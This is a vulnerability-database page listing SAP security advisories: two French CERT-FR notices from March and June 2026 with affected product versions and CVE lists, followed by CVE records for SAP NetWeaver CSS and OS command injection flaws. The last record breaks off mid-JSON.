Search

Find a vulnerability

Search criteria

    3667 vulnerabilities by SAP

    CERTFR-2026-AVI-0715

    Vulnerability from certfr_avis - Published: 2026-06-09 - Updated: 2026-06-09

    De multiples vulnérabilités ont été découvertes dans les produits SAP. Certaines d'entre elles permettent à un attaquant de provoquer une injection SQL (SQLi), une injection de code indirecte à distance (XSS) et un contournement de la politique de sécurité.

    Solutions

    Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

    Impacted products
    Vendor Product Description
    SAP BusinessObjects Business Objects versions ENTERPRISE 430, 2025 et 2027 sans le dernier correctif de sécurité
    SAP N/A MDG (Review Match Groups Application) versions S4CORE 108, SAP_BASIS 916, SAP_BASIS 917 et SAP_ABA 816 sans le dernier correctif de sécurité
    SAP NetWeaver NetWeaver AS ABAP and ABAP Platform versions SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758, SAP_BASIS 816, SAP_BASIS 918 et SAP_BASIS 919 sans le dernier correctif de sécurité
    SAP NetWeaver NetWeaver AS ABAP and ABAP Platform versions KRNL64NUC 7.22, 7.22EXT, KRNL64UC 7.22, 722EXT, 7.53, KERNEL 7.22, 7.53, 7.54, 7.77, 7.89, 7.93, 9.16, 9.18 et 91.9 sans le dernier correctif de sécurité
    SAP N/A ODP Data Replication APIs versions DW4CORE 200, 300, 400, PI_BASIS 2006_1_700, 701, 702, 731, 740, SAP_BW 750 et 816 sans le dernier correctif de sécurité
    SAP NetWeaver NetWeaver AS ABAP and ABAP Platform versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 et SAP_BASIS 816 sans le dernier correctif de sécurité
    SAP BusinessObjects Business Objects Business Intelligence Platform versions ENTERPRISE 430, 2025 et 2027 sans le dernier correctif de sécurité
    SAP NetWeaver NetWeaver AS Java (JDBC Test Servlet) version BI_UDI 7.50 sans le dernier correctif de sécurité
    SAP NetWeaver NetWeaver Application Server Java (Web Container) version ENGINEAPI 7.50 sans le dernier correctif de sécurité
    SAP Commerce Cloud Commerce Cloud and Data Hub versions HY_COM 2205, HY_DHUB 2205, COM_CLOUD 2211, 2211-JDK21 et DHUB_CLOUD 2211 sans le dernier correctif de sécurité
    SAP Commerce Cloud Commerce Cloud versions HY_COM 2205, COM_CLOUD 2211 et 2211-JDK21 sans le dernier correctif de sécurité
    SAP N/A Fiori (launchpad) versions SAP_UI 754, 755, 756, 757, 758 et 816 sans le dernier correctif de sécurité
    SAP N/A Wily Introscope Enterprise Manager version WILY_INTRO_ENTERPRISE 10.8 sans le dernier correctif de sécurité
    SAP NetWeaver NetWeaver AS Java versions SERVERCORE 7.50, CORE-TOOLS 7.50 et J2EE-APPS 7.50 sans le dernier correctif de sécurité
    SAP S/4HANA S/4HANA versions S4FND 102, 103, 104, 105, 106, 107, 108 et 109 sans le dernier correctif de sécurité
    References
    Bulletin de sécurité SAP june-2026 2026-06-09 vendor-advisory

    Show details on source website

    {
      "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
      "affected_systems": [
        {
          "description": "Business Objects versions ENTERPRISE 430, 2025 et 2027 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "BusinessObjects",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "MDG (Review Match Groups Application) versions S4CORE 108, SAP_BASIS 916, SAP_BASIS 917 et SAP_ABA 816 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "N/A",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "NetWeaver AS ABAP and ABAP Platform versions SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758, SAP_BASIS 816, SAP_BASIS 918 et SAP_BASIS 919 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "NetWeaver",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "NetWeaver AS ABAP and ABAP Platform versions KRNL64NUC 7.22, 7.22EXT, KRNL64UC 7.22, 722EXT, 7.53, KERNEL 7.22, 7.53, 7.54, 7.77, 7.89, 7.93, 9.16, 9.18 et 91.9 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "NetWeaver",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "ODP Data Replication APIs versions DW4CORE 200, 300, 400, PI_BASIS 2006_1_700, 701, 702, 731, 740, SAP_BW 750 et 816 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "N/A",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "NetWeaver AS ABAP and ABAP Platform versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 et SAP_BASIS 816 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "NetWeaver",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "Business Objects Business Intelligence Platform versions ENTERPRISE 430, 2025 et 2027 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "BusinessObjects",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "NetWeaver AS Java (JDBC Test Servlet) version BI_UDI 7.50 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "NetWeaver",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "NetWeaver Application Server Java (Web Container) version ENGINEAPI 7.50 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "NetWeaver",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "Commerce Cloud and Data Hub versions HY_COM 2205, HY_DHUB 2205, COM_CLOUD 2211, 2211-JDK21 et DHUB_CLOUD 2211 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "Commerce Cloud",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "Commerce Cloud versions HY_COM 2205, COM_CLOUD 2211 et 2211-JDK21 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "Commerce Cloud",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "Fiori (launchpad) versions SAP_UI 754, 755, 756, 757, 758 et 816 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "N/A",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "Wily Introscope Enterprise Manager version WILY_INTRO_ENTERPRISE 10.8 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "N/A",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "NetWeaver AS Java versions SERVERCORE 7.50, CORE-TOOLS 7.50 et J2EE-APPS 7.50 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "NetWeaver",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "S/4HANA versions S4FND 102, 103, 104, 105, 106, 107, 108 et 109 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "S/4HANA",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        }
      ],
      "affected_systems_content": "",
      "content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
      "cves": [
        {
          "name": "CVE-2026-44746",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44746"
        },
        {
          "name": "CVE-2026-44750",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44750"
        },
        {
          "name": "CVE-2026-44743",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44743"
        },
        {
          "name": "CVE-2026-44755",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44755"
        },
        {
          "name": "CVE-2026-44754",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44754"
        },
        {
          "name": "CVE-2026-29145",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-29145"
        },
        {
          "name": "CVE-2026-44751",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44751"
        },
        {
          "name": "CVE-2026-44757",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44757"
        },
        {
          "name": "CVE-2026-27671",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27671"
        },
        {
          "name": "CVE-2026-44744",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44744"
        },
        {
          "name": "CVE-2026-44748",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44748"
        },
        {
          "name": "CVE-2025-68161",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-68161"
        },
        {
          "name": "CVE-2026-24315",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-24315"
        },
        {
          "name": "CVE-2026-22732",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-22732"
        },
        {
          "name": "CVE-2026-40128",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-40128"
        }
      ],
      "initial_release_date": "2026-06-09T00:00:00",
      "last_revision_date": "2026-06-09T00:00:00",
      "links": [],
      "reference": "CERTFR-2026-AVI-0715",
      "revisions": [
        {
          "description": "Version initiale",
          "revision_date": "2026-06-09T00:00:00.000000"
        }
      ],
      "risks": [
        {
          "description": "Injection de code indirecte \u00e0 distance (XSS)"
        },
        {
          "description": "Injection SQL (SQLi)"
        },
        {
          "description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
        },
        {
          "description": "Contournement de la politique de s\u00e9curit\u00e9"
        }
      ],
      "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits SAP. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une injection SQL (SQLi), une injection de code indirecte \u00e0 distance (XSS) et un contournement de la politique de s\u00e9curit\u00e9.",
      "title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits SAP",
      "vendor_advisories": [
        {
          "published_at": "2026-06-09",
          "title": "Bulletin de s\u00e9curit\u00e9 SAP june-2026",
          "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news/june-2026.html"
        }
      ]
    }

    CERTFR-2026-AVI-0256

    Vulnerability from certfr_avis - Published: 2026-03-10 - Updated: 2026-03-10

    De multiples vulnérabilités ont été découvertes dans les produits SAP. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une injection SQL (SQLi).

    Solutions

    Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

    Impacted products
    Vendor Product Description
    SAP N/A S/4HANA HCM Portugal and ERP HCM Portugal versions S4HCMCPT 100, 101, 102, SAP_HRCPT 600, 604 et 608 sans le dernier correctif de sécurité
    SAP N/A Business One (Job Service) versions B1_ON_HANA 10.0 et SAP-M-BO 10.0 sans le dernier correctif de sécurité
    SAP NetWeaver Application Server ABAP NetWeaver Application Server for ABAP versions SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758, SAP_BASIS 816 et SAP_BASIS 918 sans le dernier correctif de sécurité
    SAP N/A Quotation Management Insurance application (FS-QUO) version FS-QUO 800 sans le dernier correctif de sécurité
    SAP NetWeaver Application Server ABAP NetWeaver Application Server for ABAP versions SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 et SAP_BASIS 816 sans le dernier correctif de sécurité
    SAP N/A Business Warehouse (Service API) versions DW4CORE 200, 300, 400, PI_BASIS 2006_1_700, 701, 702, 730, 731, 740, SAP_BW 750, 751, 752, 753, 754, 755, 756, 757, 758 et 816 sans le dernier correctif de sécurité
    SAP NetWeaver Application Server ABAP NetWeaver Application Server for ABAP versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 730, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 et SAP_BASIS 816 sans le dernier correctif de sécurité
    SAP N/A Supply Chain Management versions SCMAPO 713, 714, S4CORE 102, 103, 104, S4COREOP 105, 106, 107, 108, 109, SCM 700, 701, 702 et 712 sans le dernier correctif de sécurité
    SAP N/A Customer Checkout 2.0 version SAP_CUSTOMER_CHECKOUT 2.0 sans le dernier correctif de sécurité
    SAP NetWeaver Application Server ABAP NetWeaver Application Server for ABAP versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 et SAP_BASIS 816 sans le dernier correctif de sécurité
    SAP NetWeaver Application Server ABAP NetWeaver (Feedback Notification) versions SAP_ABA 700, 701, 702, 731, 740, 750, 751, 752, 75A, 75B, 75C, 75D, 75E, 75F, 75G, 75H, 75I et 816 sans le dernier correctif de sécurité
    SAP N/A Solution Tools Plug-In (ST-PI) versions ST-PI 2008_1_700, 2008_1_710, 740 et 758 sans le dernier correctif de sécurité
    SAP NetWeaver NetWeaver Enterprise Portal Administration version EP-RUNTIME 7.50 sans le dernier correctif de sécurité
    SAP NetWeaver NetWeaver AS Java (Adobe Document Services) version ADSSAP 7.50 sans le dernier correctif de sécurité
    SAP N/A GUI for Windows with active GuiXT version BC-FES-GUI 8.00 sans le dernier correctif de sécurité
    References
    Bulletin de sécurité SAP march-2026 2026-03-10 vendor-advisory

    Show details on source website

    {
      "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
      "affected_systems": [
        {
          "description": "S/4HANA HCM Portugal and ERP HCM Portugal versions S4HCMCPT 100, 101, 102, SAP_HRCPT 600, 604 et 608 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "N/A",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "Business One (Job Service) versions B1_ON_HANA 10.0 et SAP-M-BO 10.0 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "N/A",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "NetWeaver Application Server for ABAP versions SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758, SAP_BASIS 816 et SAP_BASIS 918 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "NetWeaver Application Server ABAP",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "Quotation Management Insurance application (FS-QUO) version FS-QUO 800 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "N/A",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "NetWeaver Application Server for ABAP versions SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 et SAP_BASIS 816 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "NetWeaver Application Server ABAP",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "Business Warehouse (Service API) versions DW4CORE 200, 300, 400, PI_BASIS 2006_1_700, 701, 702, 730, 731, 740, SAP_BW 750, 751, 752, 753, 754, 755, 756, 757, 758 et 816 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "N/A",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "NetWeaver Application Server for ABAP versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 730, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 et SAP_BASIS 816 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "NetWeaver Application Server ABAP",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "Supply Chain Management versions SCMAPO 713, 714, S4CORE 102, 103, 104, S4COREOP 105, 106, 107, 108, 109, SCM 700, 701, 702 et 712 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "N/A",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "Customer Checkout 2.0 version SAP_CUSTOMER_CHECKOUT 2.0 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "N/A",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "NetWeaver Application Server for ABAP versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 et SAP_BASIS 816 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "NetWeaver Application Server ABAP",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "NetWeaver (Feedback Notification) versions SAP_ABA 700, 701, 702, 731, 740, 750, 751, 752, 75A, 75B, 75C, 75D, 75E, 75F, 75G, 75H, 75I et 816 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "NetWeaver Application Server ABAP",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "Solution Tools Plug-In (ST-PI) versions ST-PI 2008_1_700, 2008_1_710, 740 et 758 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "N/A",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "NetWeaver Enterprise Portal Administration version EP-RUNTIME 7.50 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "NetWeaver",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "NetWeaver AS Java (Adobe Document Services) version ADSSAP 7.50 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "NetWeaver",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        },
        {
          "description": "GUI for Windows with active GuiXT version BC-FES-GUI 8.00 sans le dernier correctif de s\u00e9curit\u00e9",
          "product": {
            "name": "N/A",
            "vendor": {
              "name": "SAP",
              "scada": false
            }
          }
        }
      ],
      "affected_systems_content": "",
      "content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
      "cves": [
        {
          "name": "CVE-2026-24311",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-24311"
        },
        {
          "name": "CVE-2026-24313",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-24313"
        },
        {
          "name": "CVE-2019-17571",
          "url": "https://www.cve.org/CVERecord?id=CVE-2019-17571"
        },
        {
          "name": "CVE-2026-27685",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27685"
        },
        {
          "name": "CVE-2026-24316",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-24316"
        },
        {
          "name": "CVE-2025-9232",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-9232"
        },
        {
          "name": "CVE-2026-27687",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27687"
        },
        {
          "name": "CVE-2026-27686",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27686"
        },
        {
          "name": "CVE-2026-27684",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27684"
        },
        {
          "name": "CVE-2026-24310",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-24310"
        },
        {
          "name": "CVE-2026-27688",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27688"
        },
        {
          "name": "CVE-2026-24309",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-24309"
        },
        {
          "name": "CVE-2026-27689",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27689"
        },
        {
          "name": "CVE-2025-9230",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-9230"
        },
        {
          "name": "CVE-2026-24317",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-24317"
        },
        {
          "name": "CVE-2026-0489",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0489"
        }
      ],
      "initial_release_date": "2026-03-10T00:00:00",
      "last_revision_date": "2026-03-10T00:00:00",
      "links": [],
      "reference": "CERTFR-2026-AVI-0256",
      "revisions": [
        {
          "description": "Version initiale",
          "revision_date": "2026-03-10T00:00:00.000000"
        }
      ],
      "risks": [
        {
          "description": "D\u00e9ni de service \u00e0 distance"
        },
        {
          "description": "Injection de code indirecte \u00e0 distance (XSS)"
        },
        {
          "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
        },
        {
          "description": "Injection SQL (SQLi)"
        },
        {
          "description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
        },
        {
          "description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
        }
      ],
      "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits SAP. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une injection SQL (SQLi).",
      "title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits SAP",
      "vendor_advisories": [
        {
          "published_at": "2026-03-10",
          "title": "Bulletin de s\u00e9curit\u00e9 SAP march-2026",
          "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news/march-2026.html"
        }
      ]
    }

    CVE-2026-27680 (GCVE-0-2026-27680)

    Vulnerability from nvd – Published: 2026-05-14 18:33 – Updated: 2026-05-14 19:17
    VLAI
    Title
    CSS Injection vulnerability in SAP NetWeaver Application Server ABAP
    Summary
    Due to improper input handling under certain conditions, SAP NetWeaver Application Server ABAP allows an attacker to inject custom Cascading Style Sheets (CSS) data into a web page served by the application. When a user accesses or clicks the affected page, the injected CSS is executed. As a result, the issue has a low impact on confidentiality, while integrity and availability are not impacted.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-276 - Incorrect Default Permissions
    Assigner
    sap
    Impacted products
    Vendor Product Version
    SAP_SE SAP NetWeaver Application Server ABAP Affected: SAP_UI 758
    Affected: 816
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-27680",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-05-14T19:17:39.273035Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-05-14T19:17:51.192Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "SAP NetWeaver Application Server ABAP",
              "vendor": "SAP_SE",
              "versions": [
                {
                  "status": "affected",
                  "version": "SAP_UI 758"
                },
                {
                  "status": "affected",
                  "version": "816"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eDue to improper input handling under certain conditions, SAP NetWeaver Application Server ABAP allows an attacker to inject custom Cascading Style Sheets (CSS) data into a web page served by the application. When a user accesses or clicks the affected page, the injected CSS is executed. As a result, the issue has a low impact on confidentiality, while integrity and availability are not impacted.\u003c/p\u003e"
                }
              ],
              "value": "Due to improper input handling under certain conditions, SAP NetWeaver Application Server ABAP allows an attacker to inject custom Cascading Style Sheets (CSS) data into a web page served by the application. When a user accesses or clicks the affected page, the injected CSS is executed. As a result, the issue has a low impact on confidentiality, while integrity and availability are not impacted."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 3.1,
                "baseSeverity": "LOW",
                "confidentialityImpact": "LOW",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-276",
                  "description": "CWE-276: Incorrect Default Permissions",
                  "lang": "eng",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-05-14T18:33:26.129Z",
            "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
            "shortName": "sap"
          },
          "references": [
            {
              "url": "https://me.sap.com/notes/3665042"
            },
            {
              "url": "https://url.sap/sapsecuritypatchday"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "CSS Injection vulnerability in SAP NetWeaver Application Server ABAP",
          "x_generator": {
            "engine": "Vulnogram 1.0.2"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "assignerShortName": "sap",
        "cveId": "CVE-2026-27680",
        "datePublished": "2026-05-14T18:33:26.129Z",
        "dateReserved": "2026-02-23T17:50:10.513Z",
        "dateUpdated": "2026-05-14T19:17:51.192Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-40135 (GCVE-0-2026-40135)

    Vulnerability from nvd – Published: 2026-05-12 02:21 – Updated: 2026-05-12 13:03
    VLAI
    Title
    OS Command Injection vulnerability in SAP NetWeaver Application Server for ABAP and ABAP Platform
    Summary
    An OS Command Injection vulnerability exists in the SAP NetWeaver Application Server for ABAP and ABAP Platform that allows an authenticated attacker with administrative access to execute specially crafted shell commands on the server, bypassing the logging mechanism. This allows the execution of unintended OS commands without detection, potentially impacting the integrity and availability of the application, with no impact on confidentiality.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-77 - Improper Neutralization of Special Elements used in a Command
    Assigner
    sap
    Impacted products
    Vendor Product Version
    SAP_SE SAP NetWeaver Application Server for ABAP and ABAP Platform Affected: SAP_BASIS 700
    Affected: SAP_BASIS 701
    Affected: SAP_BASIS 702
    Affected: SAP_BASIS 731
    Affected: SAP_BASIS 740
    Affected: SAP_BASIS 750
    Affected: SAP_BASIS 751
    Affected: SAP_BASIS 752
    Affected: SAP_BASIS 753
    Affected: SAP_BASIS 754
    Affected: SAP_BASIS 755
    Affected: SAP_BASIS 756
    Affected: SAP_BASIS 757
    Affected: SAP_BASIS 758
    Affected: SAP_BASIS 816
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-40135",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-05-12T13:03:42.768169Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-05-12T13:03:50.003Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "SAP NetWeaver Application Server for ABAP and ABAP Platform",
              "vendor": "SAP_SE",
              "versions": [
                {
                  "status": "affected",
                  "version": "SAP_BASIS 700"
                },
                {
                  "status": "affected",
